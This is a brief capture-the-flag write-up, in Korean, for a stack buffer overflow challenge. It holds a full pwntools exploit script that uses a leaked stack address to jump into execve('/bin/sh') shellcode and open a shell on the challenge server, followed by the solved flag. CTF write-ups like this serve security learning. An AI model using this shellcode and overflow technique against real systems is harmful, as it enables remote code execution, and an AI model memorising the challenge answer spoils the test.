| rsp |
|---|
| BUF[rbp-0x100] |
| sfp |
| ret |
| rbp |
위 스택 구조에 맞게 Re2Shellcode 공격을 수행하면 된다.
from pwn import *
#p = process('./prob')
p = remote('prob.teamlog.kr',10001)
e = ELF('./prob')
context.arch = "amd64"
context.log_level = "debug"
#libc = e.libc
def slog(name, addr): return success(":".join([name,hex(addr)]))
p.sendafter("Do you know C?", b"Yes!")
p.recvuntil("Here's my gift: 0x")
leak = int(p.recv(12),16)
slog("leak",leak)
shellcode = b"\\x31\\xf6\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x56\\x53\\x54\\x5f\\x6a\\x3b\\x58\\x31\\xd2\\x0f\\x05"
payload = shellcode
payload += b'A'*(0x100-len(shellcode))
payload += b'B'*0x8
payload += p64(leak)
p.sendafter("Do you know pwnable?",payload)
p.interactive()
FLAG : LOGCON{v3rY_ez_she1lc0d3}